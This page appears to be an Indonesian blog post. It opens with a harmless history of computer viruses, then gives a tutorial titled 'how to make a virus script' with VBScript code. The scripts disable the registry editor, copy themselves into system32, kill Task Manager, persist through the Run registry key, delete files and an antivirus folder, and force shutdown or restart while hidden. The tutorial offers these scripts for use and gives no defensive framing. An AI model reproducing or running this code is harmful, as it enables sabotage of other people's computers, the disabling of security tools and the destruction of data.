Virus - Sejarah dan Evolusi

Disebut virus komputer, karena program perusak ini memiliki banyak kesamaan dengan virus biologis yang telah lebih dulu dikenal. Keduanya memiliki pola penyebaran yang sama. Manusia yang terinfeksi sebuah virus akan menulari manusia lain yang melakukan kontak dengannya.Demikian pula komputer yang terjangkiti virus, dia akan menulari komputer lain yang berbagi file dengannya.

Kesamaan lainnya terletak pada pola reproduksi. Karena tidak dapat mereproduksi dirinya sendiri, virus biologis menyuntikkan DNA-nya ke dalam sel tubuh manusia, dan memanfaatkan sistem reproduksi sel untuk berkembang biak. Hal yang sama berlaku pula pada virus komputer. Untuk meluncurkan serangan, virus komputer menunggangi sejumlah program atau dokumen lain. Pada saat program atau dokumen yang telah terinfeksi dijalankan, virus komputer akan menginfeksi program atau dokumen lainnya. Sifat-sifat khusus di atas yang membedakan virus dengan malware lain seperti worm malware yang bisa menyebarkan dan menggandakan dirinya sendiri atau spyware malware yang biasanya berjalan sebagai program standalone.

Sejarah Virus
Virus komputer kali pertama menyebar pada akhir 1980-an karena beberapa faktor. Faktor pertama adalah meluasnya pemakaian PC.Sebelum 1980-an, komputer rumahan hampir dapat dikatakan belum ada atau hanya berupa mainan. Komputer yang sesungguhnya masih sangat jarang, dan hanya digunakan oleh “para ahli” dari kalangan tertentu.

Faktor kedua adalah penggunaan computer bulletin board. Orang-orang dapat men-dial up sebuah bulletin board menggunakan modem, dan men-download berbagai jenis program komputer yang paling populer pada masa itu adalah game, kemudian disusul oleh word processor, spreadsheet, dan aplikasi produktif lainnya. Bulletin board pulalah yang mengantarkan sebuah virus perintis yang dikenal sebagai Trojan horse. Virus-virus generasi pertama tersebut merupakan sekumpulan kode yang disusupkan ke dalam program yang umum digunakan orang pada waktu itu, seperti game atau word processor populer.

Ketika seseorang mendownload program yang telah diinfeksi dengan kode-kode jahat tersebut dari bulletin board, dan menjalankannya di PC, virus me-loading dirinya ke dalam memory, dan mulai bekerja mencari program lain yang akan diinfeksi. Selanjutnya, penularan virus terjadi bila program yang telah terinfeksi diberikan kepada pengguna lain, baik melalu media floppy disk maupun di-upload ke bulletin board.

Evolusi Virus
Salah satu perkembangan penting yang berhasil diraih oleh virus adalah kemampuannya masuk ke dalam memory, dan tetap berjalan di belakang layar selama komputer menyala. Hal ini memberikan keleluasaan bagi virus untuk mereplikasinya dirinya secara efektif.

Perkembangan penting lainnya adalah kemampuan menginfeksi boot sector pada floppy disk dan hard disk. Boot sector adalah program kecil yang merupakan bagian pertama dari operating system yang di-loading ke dalam memory, saat komputer kali pertama dinyalakan. Dengan meletakkan kode-kodenya pada boot sector, sebuah virus memastikan dirinya akan tereksekusi dan aktif di komputer.

Virus yang ada di boot sector dapat menginfeksi boot sector setiap floppy disk yang dimasukkan ke dalam komputer yang telah terinfeksi. Jamaknya penggunaan komputer bersama seperti di rental komputer, warnet, atau kampus menjadikan penyebaran virus ini semakin tak terkendali.

Era kejayaan virus boot sector surut, karena ukuran program komputer yang semakin tambun tak lagi memungkinkan ditampung dalam sebuah floppy disk. Sebagai gantinya, program-program komputer didistribusikan di dalam CD yang tidak dapat ditulis (read-only). Namun, siklus kehidupan selalu berputar. Apa yang pernah terjadi pada masa silam, pasti akan terulang di masa depan.Begitu pula dengan pola penyebaran virus komputer. Virus telah menemukan jalan lain untuk menyebarluaskan dirinya, yakni melalui e-mail dan penggunaan USB flash disk.

Penyebaran virus komputer via Internet bukan barang baru, namun telah berlangsung sejak era bulletin board.Bila dulu virus disebarkan melalui bulletin board, sekarang mereka menggunakan e-mail yang dikirim sebagai spam. Demikian pula dengan virus boot sector yang dulu mengincar floppy disk, dan sempat surut ketika media penyimpanan populer berubah menjadi CD, kini mengubah sasarannya menjadi USB flash disk.

Sumber : PC Mild

Read more »

Cara membuat script virus

1.mendisable registry

1.Masuk Notepad kemudian tulis script di bawah ini :

On Error Resume Next(perintah ini digunakan pada file vb

supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)

CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\poli cies\system /v

disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kayak gini:

CreateObject("WScript.Shell").regwriteHKEY_CURRENT _USER\software\microsoft\windows\currentversion\po licies\systemdisableregistrytools", 1, "REG_DWORD"

2.save dengan nama yang kmska.vbs

2.Membuat Virus yang Dapat Mengopykan Diri Ke Derektory Lain

1.Masuk Notepad kemudian tulis script di bawah ini :

CreateObject("Scripting.FileSystemObject").

GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"

Ada juga cara lain dengan kide seperti ini:

On Error Resume Next

createobject("scripting.filesystemobject").copyfil e wscript.scriptfullname,

createobject("scripting.filesystemobject")

.getspecialfolder(1) & "\virus.vbs"

misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32

dengan nama virus.vbs

.getspecialfolder(0) digunakan untuk direktory WINDOWS

.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP

.getspecialfolder(2) digunakan untuk direktory Temporary

2.simpan dengan nama yg km ska.vbs

3.Membuat Virus Pembunuh Proses

1.Masuk Notepad kemudian tulis script di bawah ini :

misalnya kita akan membunuh proses taskmanager

On Error Resume Next

CreateObject("WScript.Shell")

.run "taskkill /f /im taskmgr.exe", vbhide

2.save eksistensinya vbs

4.Menjalankan Virus Pada Saat Startup Atau Saat Windows Dihidupkan

1.On Error Resume Next

CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\Curr entVersion\Run\virus"

, "c:\windows\system32\virus.vbs"

(menjalankan virus yang berada di direktory c:\windows\system32

dengan nama virus.vbs)

2.simpan dalam bentuk eksistensi reg(caranya sma ama vbs)

5.Membuat Virus Yang Dapat Menghapus File/Folder

Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:

On Error Resume Next

set hapus = CreateObject("Scripting.FileSystemObject")

hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)

hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)

Contoh :

On Error resume Next

set hapus = CreateObject(”Scripting.FileSystemObject”)

hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”

hapus.DeleteFolder “C:\antivirus”

Simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs

6.Membuat Virus Yang Dapat Merestart Windows

Masuk Notepad kemudian tulis script di bawah ini :

CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide

merestart windows dalam waktu 60 sekon

Simpan script tersebut dalam bentuk file.vbs, misal: virusrestart.vbs

7.Membuat Virus Yang Dapat Men-Shutdown Dan Merestart Windows

Masuk Notepad kemudian tulis script di bawah ini :

CreateObject("WScript.Shell").run "shutdown -s -f -t 60", vbhide

Mematikan windows dalam waktu 60 sekon

“shutdown -s -f -t 60"

S = untuk shutdown dan

R = untuk reboot\restart

Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs

Read more »